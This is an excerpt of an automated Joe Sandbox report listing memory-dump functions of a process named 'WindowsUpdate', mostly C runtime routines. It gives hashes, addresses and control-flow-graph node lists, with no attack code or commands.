    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6b0615b479b7a91f68ae1a9e27a03b4d5ee12cf8588eb5a9d803f239afc1481f
    • Instruction ID: 0de46600f7153d8237573c0811ebb5e69aaf76aac2106b581b63f0ded334c047
    • Opcode Fuzzy Hash: 6b0615b479b7a91f68ae1a9e27a03b4d5ee12cf8588eb5a9d803f239afc1481f
    • Instruction Fuzzy Hash: 4E31E520728BA54FA308993D48894357BD0E7DA30B39441BEF8DAC71A3DA38D547E7E5
    Function 00000217700D8897 Relevance: .1, Instructions: 94COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: aa4d2c802d0d433d92626876e2858a5a2af5341ceb511a673eb0f96ae7579dfa
    • Instruction ID: e22ef742e0db36b72f62dbd261b77a4fed115a336eed930a4cb77426be0294c9
    • Opcode Fuzzy Hash: aa4d2c802d0d433d92626876e2858a5a2af5341ceb511a673eb0f96ae7579dfa
    • Instruction Fuzzy Hash: E221742021DAC69ED30D866D6901064FFE0EA6A600728D76EF5DFC3B43D524E527C7EA
    Function 00000217700D848B Relevance: .1, Instructions: 56COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 86ccce87b2b14fa470a83852fef3d8cf58e90f9dade9ee2a733e7aefd2b2bddf
    • Instruction ID: 2084fcb7f6341c7ce3548e4d7fc1c9e74246735795ecd4145e70eb18c36b8e8b
    • Opcode Fuzzy Hash: 86ccce87b2b14fa470a83852fef3d8cf58e90f9dade9ee2a733e7aefd2b2bddf
    • Instruction Fuzzy Hash: 87F02B22B6C56403571C487E286A23AB2C2D3D620B310D23EFECBD39C3DD34084765E9
    Function 00000217700D856F Relevance: .1, Instructions: 56COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 32c72e14815b0a587c48383575dd2ba5f9259c8286b15177e09bacb5e12ecb41
    • Instruction ID: 8d9ce99fc0f3dd8365adca9c371e44f5039d0f9ea9f169b449274232f0d2eeba
    • Opcode Fuzzy Hash: 32c72e14815b0a587c48383575dd2ba5f9259c8286b15177e09bacb5e12ecb41
    • Instruction Fuzzy Hash: 7AF0C23276815407A30C883E58A6535B2C3E3DA607321D23DFECBC3983CD34044796E9
    Function 00000217700D8658 Relevance: .1, Instructions: 53COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a5374cc5611bc19f6640507c35c160bb5b1642721f95a3bf9f3ec5ae6519fa22
    • Instruction ID: de7982eb01d7fc7ea9954a123abd89378250d9126415666dabc142b2b0d67538
    • Opcode Fuzzy Hash: a5374cc5611bc19f6640507c35c160bb5b1642721f95a3bf9f3ec5ae6519fa22
    • Instruction Fuzzy Hash: 3DF0BB2175865507670C8C7E58A6175A1C7D3DA607320D13DFFCBC29C3DC74044B55E9
    Function 00000217700B0B84 Relevance: .0, Instructions: 10COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 198daca5443bd49bd945e2e1aa80fc2103fafffc5749c1f763f42f6f5df33067
    • Instruction ID: d1023468a0d671a11c6a7233f7c3446d299604f1f16d6b52564ca15d107ddc24
    • Opcode Fuzzy Hash: 198daca5443bd49bd945e2e1aa80fc2103fafffc5749c1f763f42f6f5df33067
    • Instruction Fuzzy Hash: CEB092B5B121105A8B84ED3484A84B1F6B19B8B201F0020B9600AE70A4EE11D801CA18
    Function 00007FF7300A2350 Relevance: .0, Instructions: 2COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7ef51fdf445075620131bce95d9722f0d4399cdffa43972b5686f4bfbf193af5
    • Instruction ID: 1003413c99e3c96a4361199493c68e4a9faaf5cd67de248e86809452494502bb
    • Opcode Fuzzy Hash: 7ef51fdf445075620131bce95d9722f0d4399cdffa43972b5686f4bfbf193af5
    • Instruction Fuzzy Hash: 45A00222D0CD06F0EA44AB54E865572E334FB55308BC00031F51D416A8EF3CB530E334
    Function 00000217700DB2E0 Relevance: 12.3, APIs: 8, Instructions: 298COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 400 217700db2e0-217700db2e6 401 217700db321-217700db32b 400->401 402 217700db2e8-217700db2eb 400->402 405 217700db448-217700db45d 401->405 403 217700db315-217700db354 call 217700db894 402->403 404 217700db2ed-217700db2f0 402->404 423 217700db422 403->423 424 217700db35a-217700db36f call 217700db728 403->424 406 217700db2f2-217700db2f5 404->406 407 217700db308 __scrt_dllmain_crt_thread_attach 404->407 408 217700db45f 405->408 409 217700db46c-217700db486 call 217700db728 405->409 411 217700db301-217700db306 call 217700db7d8 406->411 412 217700db2f7-217700db300 406->412 415 217700db30d-217700db314 407->415 413 217700db461-217700db46b 408->413 421 217700db4bb-217700db4ec call 217700dba54 409->421 422 217700db488-217700db4b9 call 217700db850 call 217700db6f8 call 217700dbbd8 call 217700db9f4 call 217700dba18 call 217700db880 409->422 411->415 434 217700db4ee-217700db4f4 421->434 435 217700db4fd-217700db503 421->435 422->413 428 217700db424-217700db439 423->428 432 217700db375-217700db386 call 217700db798 424->432 433 217700db43a-217700db447 call 217700dba54 424->433 450 217700db388-217700db3ac call 217700dbb9c call 217700db6e8 call 217700db70c call 217700e1238 432->450 451 217700db3d7-217700db3e1 call 217700db9f4 432->451 433->405 434->435 439 217700db4f6-217700db4f8 434->439 440 217700db505-217700db50f 435->440 441 217700db54a-217700db560 call 217700af6d0 435->441 446 217700db5eb-217700db5f8 439->446 447 217700db511-217700db519 440->447 448 217700db51b-217700db529 440->448 460 217700db562-217700db564 441->460 461 217700db598-217700db59a 441->461 453 217700db52f-217700db544 call 217700db2e0 447->453 448->453 464 217700db5e1-217700db5e9 448->464 450->451 500 217700db3ae-217700db3b5 __scrt_dllmain_after_initialize_c 450->500 451->423 472 217700db3e3-217700db3ef call 217700dba44 451->472 453->441 453->464 460->461 469 217700db566-217700db588 call 217700af6d0 call 217700db448 460->469 462 217700db5a1-217700db5b6 call 217700db2e0 461->462 463 217700db59c-217700db59f 461->463 462->464 481 217700db5b8-217700db5c2 462->481 463->462 463->464 464->446 469->461 495 217700db58a-217700db590 469->495 489 217700db415-217700db420 472->489 490 217700db3f1-217700db3fb call 217700db95c 472->490 486 217700db5c4-217700db5cb 481->486 487 217700db5cd-217700db5dd 481->487 486->464 487->464 489->428 490->489 499 217700db3fd-217700db412 490->499 495->461 499->489 500->451 501 217700db3b7-217700db3d5 call 217700e11c0 500->501 501->451
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
    • String ID:
    • API String ID: 190073905-0
    • Opcode ID: 1bcaed9eda35ba992f7e29348d3af3b390d9174a36d9108e90f8fe65cf239a7c
    • Instruction ID: b699f2fa7fae080cfbf85e07f301f47258a4326fae29d0e0046c6cd480be9f03
    • Opcode Fuzzy Hash: 1bcaed9eda35ba992f7e29348d3af3b390d9174a36d9108e90f8fe65cf239a7c
    • Instruction Fuzzy Hash: 9491C83071CA05EBF756AB2CA85D3E9B2F1EBEA320F444119E405C32D7DA64C967C762
    Function 00000217700DF598 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 371COMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 504 217700df598-217700df5c4 505 217700df5c6-217700df5d1 call 217700e2b70 call 217700e2820 504->505 506 217700df5ec-217700df5ef 504->506 514 217700df5d6-217700df5dd 505->514 507 217700df5f1-217700df5f8 506->507 508 217700df5fa-217700df61c call 217700dded4 506->508 507->505 507->508 515 217700df61f-217700df62a 508->515 516 217700df5e5-217700df5e7 514->516 517 217700df5df-217700df5e3 514->517 518 217700df640-217700df64b 515->518 519 217700df62c-217700df63e call 217700e485c 515->519 520 217700df88d-217700df8aa 516->520 517->516 522 217700df64d-217700df64f 518->522 519->522 523 217700df651-217700df65a 522->523 524 217700df65c-217700df66a 522->524 523->515 526 217700df672-217700df676 524->526 527 217700df66c-217700df670 524->527 528 217700df678-217700df682 526->528 529 217700df684-217700df693 526->529 527->528 528->529 530 217700df719-217700df71a 529->530 531 217700df699-217700df69e 529->531 534 217700df71f-217700df728 530->534 532 217700df6a0-217700df6a7 531->532 533 217700df6a9-217700df6ae 531->533 535 217700df6cc-217700df6d4 532->535 536 217700df6b0-217700df6b7 533->536 537 217700df6b9-217700df6be 533->537 538 217700df72a-217700df730 534->538 543 217700df6d6-217700df6d9 535->543 544 217700df6e1-217700df6f2 535->544 536->535 541 217700df6c0-217700df6c7 537->541 542 217700df6c9-217700df6ca 537->542 539 217700df753-217700df758 538->539 540 217700df732-217700df739 538->540 548 217700df763-217700df768 539->548 549 217700df75a-217700df761 539->549 547 217700df776-217700df779 540->547 541->535 542->535 543->534 550 217700df6db-217700df6df 543->550 545 217700df6f4-217700df703 544->545 546 217700df73b-217700df751 544->546 545->534 551 217700df705-217700df707 545->551 546->534 552 217700df77b-217700df77e 547->552 553 217700df7a8-217700df7b1 547->553 554 217700df773-217700df774 548->554 555 217700df76a-217700df771 548->555 549->547 550->534 551->534 556 217700df709-217700df714 call 217700e2b70 call 217700e2820 551->556 552->553 557 217700df780-217700df786 552->557 558 217700df7b3-217700df7b6 553->558 559 217700df7c8-217700df7cc 553->559 554->547 555->547 556->530 563 217700df794-217700df798 557->563 564 217700df788 557->564 558->559 565 217700df7b8-217700df7c3 call 217700e2b70 call 217700e2820 558->565 560 217700df7ce-217700df7d5 559->560 561 217700df7eb-217700df7f7 call 217700df558 559->561 560->514 566 217700df7db-217700df7e6 560->566 576 217700df863-217700df867 561->576 577 217700df7f9-217700df808 call 217700e2b70 561->577 571 217700df79a-217700df7a6 563->571 569 217700df78e-217700df792 564->569 570 217700df78a-217700df78c 564->570 565->559 566->514 569->571 570->563 570->569 571->538 579 217700df86b-217700df86f 576->579 580 217700df869 576->580 585 217700df80f-217700df813 577->585 586 217700df80a-217700df80d 577->586 582 217700df871-217700df875 579->582 583 217700df87c-217700df883 579->583 580->579 582->583 587 217700df885-217700df889 583->587 588 217700df88b 583->588 589 217700df815-217700df819 585->589 590 217700df83c-217700df840 585->590 586->579 587->588 588->520 593 217700df826-217700df82d 589->593 594 217700df81b-217700df81f 589->594 591 217700df842-217700df846 590->591 592 217700df84d-217700df854 590->592 591->592 595 217700df856-217700df85a 592->595 596 217700df85c-217700df861 592->596 597 217700df835-217700df83a 593->597 598 217700df82f-217700df833 593->598 594->593 595->596 596->520 597->520 598->597
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: +$-
    • API String ID: 3215553584-2137968064
    • Opcode ID: fbf6cd382c2852d4e28143f915c8d0d860ebd4580120439a1f635061b0a62a20
    • Instruction ID: 6679cc75429b2aa56d4bec7865268e1b22946d1972e5093166bd488d87c9dc4c
    • Opcode Fuzzy Hash: fbf6cd382c2852d4e28143f915c8d0d860ebd4580120439a1f635061b0a62a20
    • Instruction Fuzzy Hash: 82C1D43010CA198EEB6ADB28D4897F9B7F0FBA7320F148159D49BC72DADA20D853C751
    Function 00000217700E56F0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 245COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 599 217700e56f0-217700e5720 600 217700e5722-217700e5728 599->600 601 217700e572a-217700e572d 599->601 600->600 600->601 602 217700e572f-217700e5732 601->602 603 217700e5750 601->603 604 217700e5745-217700e574e 602->604 605 217700e5734-217700e5737 602->605 606 217700e5756 603->606 609 217700e575d-217700e576c 604->609 607 217700e596d-217700e5978 call 217700e2b70 call 217700e2820 605->607 608 217700e573d-217700e5743 605->608 606->609 622 217700e597d-217700e598a 607->622 608->606 611 217700e576e-217700e5771 609->611 613 217700e589b-217700e589e 611->613 614 217700e5777-217700e577d 611->614 616 217700e58a3-217700e58a6 613->616 617 217700e58a0-217700e58a1 613->617 618 217700e5783 614->618 619 217700e581c-217700e581f 614->619 616->617 623 217700e58a8-217700e58ab 616->623 617->616 624 217700e580c-217700e580f 618->624 625 217700e5789-217700e578c 618->625 620 217700e5875-217700e587b 619->620 621 217700e5821-217700e5824 619->621 631 217700e587d-217700e587f 620->631 632 217700e5881 620->632 626 217700e5866-217700e586d 621->626 627 217700e5826-217700e5829 621->627 628 217700e58bf-217700e58d6 call 217700e0d70 623->628 629 217700e58ad-217700e58b0 623->629 630 217700e5811 624->630 624->631 633 217700e5792-217700e5795 625->633 634 217700e5889-217700e5895 625->634 626->631 642 217700e586f-217700e5873 626->642 638 217700e5854-217700e5857 627->638 639 217700e582b-217700e582e 627->639 628->607 658 217700e58dc-217700e58e0 628->658 629->607 640 217700e58b6-217700e58ba 629->640 643 217700e5814-217700e581a 630->643 631->634 637 217700e5885 632->637 635 217700e57e0-217700e57e3 633->635 636 217700e5797-217700e579a 633->636 634->611 634->613 635->631 650 217700e57e9-217700e57f0 635->650 644 217700e579c-217700e579f 636->644 645 217700e57d8-217700e57db 636->645 646 217700e5887 637->646 638->631 649 217700e5859 638->649 647 217700e5830-217700e5833 639->647 648 217700e5848-217700e584b 639->648 640->622 642->637 643->634 652 217700e57c6-217700e57ca 644->652 653 217700e57a1-217700e57a4 644->653 645->631 646->634 647->607 654 217700e5839-217700e5840 647->654 648->631 655 217700e584d-217700e5852 648->655 656 217700e585e-217700e5864 649->656 650->631 657 217700e57f6-217700e580a 650->657 652->631 662 217700e57d0-217700e57d3 652->662 659 217700e57a6-217700e57a9 653->659 660 217700e57bd-217700e57c1 653->660 654->631 661 217700e5842-217700e5846 654->661 655->656 656->634 657->646 663 217700e58e5-217700e58e8 658->663 659->607 666 217700e57af-217700e57b2 659->666 660->646 661->637 662->637 664 217700e58e2-217700e58e3 663->664 665 217700e58ea-217700e58ed 663->665 664->663 665->607 667 217700e58ef-217700e58f5 665->667 666->631 668 217700e57b8-217700e57bb 666->668 667->667 669 217700e58f7-217700e590e call 217700ec660 667->669 668->643 672 217700e5910-217700e5918 669->672 673 217700e591a-217700e5931 call 217700ec660 669->673 674 217700e5963-217700e5966 672->674 679 217700e5933-217700e593b 673->679 680 217700e593d-217700e5954 call 217700ec660 673->680 676 217700e5960-217700e5961 674->676 677 217700e5968 674->677 676->674 677->629 679->674 680->607 683 217700e5956-217700e595e 680->683 683->674
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: $a$r$w
    • API String ID: 3215553584-756186705
    • Opcode ID: 76e6e779ffc6c2a48241b956784a8cc011c624d01c85670fa86d22010ce8d801
    • Instruction ID: f9732e969a4776e207e98421039ffb2a997e2b70b8ce5bc44a48efdc75a84184
    • Opcode Fuzzy Hash: 76e6e779ffc6c2a48241b956784a8cc011c624d01c85670fa86d22010ce8d801
    • Instruction Fuzzy Hash: 8F81C37040C61E8AFB7B6A28969C3E5FBF0EBB7326F641919D092F21C2D7658807D301
    Function 00000217700DE058 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 684 217700de058-217700de078 685 217700de092-217700de096 684->685 686 217700de07a-217700de08d call 217700e2b70 call 217700e2820 684->686 685->686 688 217700de098-217700de0a5 685->688 692 217700de241-217700de255 686->692 690 217700de23e 688->690 691 217700de0ab-217700de0af 688->691 690->692 694 217700de0b5-217700de0bb 691->694 696 217700de20b-217700de216 694->696 697 217700de0c0-217700de0c7 696->697 698 217700de21c-217700de21d 696->698 699 217700de220-217700de223 697->699 700 217700de0cd-217700de0d7 697->700 698->699 703 217700de225-217700de229 699->703 704 217700de22b-217700de238 699->704 701 217700de0d9-217700de0e6 700->701 702 217700de0e8 700->702 705 217700de0ea-217700de0fe 701->705 702->705 703->704 706 217700de256-217700de261 call 217700e2b70 call 217700e2820 703->706 704->690 704->694 705->706 707 217700de104-217700de106 705->707 718 217700de266-217700de268 706->718 709 217700de1ff-217700de202 call 217700de470 707->709 710 217700de10c-217700de10f 707->710 719 217700de207-217700de209 709->719 712 217700de115-217700de118 710->712 713 217700de1eb-217700de1fd 710->713 716 217700de1b6-217700de1bb 712->716 717 217700de11e-217700de121 712->717 713->696 722 217700de1e5-217700de1e9 716->722 723 217700de1bd-217700de1bf 716->723 720 217700de123-217700de126 717->720 721 217700de18a-217700de18e 717->721 718->692 719->696 719->718 724 217700de182-217700de185 720->724 725 217700de128-217700de12b 720->725 726 217700de196-217700de1a7 721->726 727 217700de190-217700de194 721->727 722->696 728 217700de1c1-217700de1c3 723->728 729 217700de1df-217700de1e3 723->729 724->696 732 217700de155-217700de159 725->732 733 217700de12d-217700de130 725->733 735 217700de1b2-217700de1b4 726->735 736 217700de1a9-217700de1af 726->736 734 217700de15f-217700de167 call 217700ddfd4 727->734 730 217700de1c5-217700de1c7 728->730 731 217700de1d9-217700de1dd 728->731 729->696 737 217700de1d3-217700de1d7 730->737 738 217700de1c9-217700de1cb 730->738 731->696 739 217700de15b-217700de15c 732->739 740 217700de16c-217700de180 732->740 742 217700de132-217700de135 733->742 743 217700de148-217700de150 call 217700de57c 733->743 734->719 735->719 736->735 737->696 738->696 744 217700de1cd-217700de1d1 738->744 739->734 740->735 742->718 746 217700de13b-217700de143 call 217700de6f8 742->746 743->719 744->696 746->719
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: $*
    • API String ID: 3215553584-3982473090
    • Opcode ID: dee95082375713012a0ee46cc4461d6a046e0bc004875f79c28932982656cf83
    • Instruction ID: 84ecd104aaa938889f22fec287530b3bd09e29acae161256b395eb89edce1125
    • Opcode Fuzzy Hash: dee95082375713012a0ee46cc4461d6a046e0bc004875f79c28932982656cf83
    • Instruction Fuzzy Hash: 0261577050C6848BEBAEAF18849C3F5BAB5BBA7328F54119DD8568A1D6C330C853C761
    Function 00000217700DE26C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: $*
    • API String ID: 3215553584-3982473090
    • Opcode ID: 980a9cffe64fdac3436792e900bb49151484fe00cda665722affd768e57de039
    • Instruction ID: b3c63304bba23544dd8d01d3af90e3c5d70be02a0c9b30eef63fde632e6ea26b
    • Opcode Fuzzy Hash: 980a9cffe64fdac3436792e900bb49151484fe00cda665722affd768e57de039
    • Instruction Fuzzy Hash: A561737011C6848FEF6EAF28C0CC3F4BAB0BBA7329F541199C8468A1D6C324C5A7C761
    Function 00000217700ECB00 Relevance: 6.2, APIs: 4, Instructions: 185COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo$_get_daylight
    • String ID:
    • API String ID: 72036449-0
    • Opcode ID: a8e5606c9b208da2959c5035297232c1de727985b8321145b172a1308e9046c1
    • Instruction ID: 1af4a6183e31f06ae6cbe3f9932ec6a978a7f89fe2188f38ae1db504ea7a4178
    • Opcode Fuzzy Hash: a8e5606c9b208da2959c5035297232c1de727985b8321145b172a1308e9046c1
    • Instruction Fuzzy Hash: 6B51983150C60C46F76B792C844DBEAE6A0E7E3334F25456AD85AFB2D2C766CC43C642
    Function 00000217700E77C0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 275COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: *?$.
    • API String ID: 3215553584-3972193922
    • Opcode ID: 5a742023445d716bea24937db52e92d8e4ee559647646a006248351805cd277c
    • Instruction ID: a19420a0d801fed24461acd2c9f48c23d94f3e461a941290ed0c46ffd288ac22
    • Opcode Fuzzy Hash: 5a742023445d716bea24937db52e92d8e4ee559647646a006248351805cd277c
    • Instruction Fuzzy Hash: 92717531628E1D4FDB59FB6C985D6E9B3E1FBE9320F04426ED449E32C6DA309842C6C1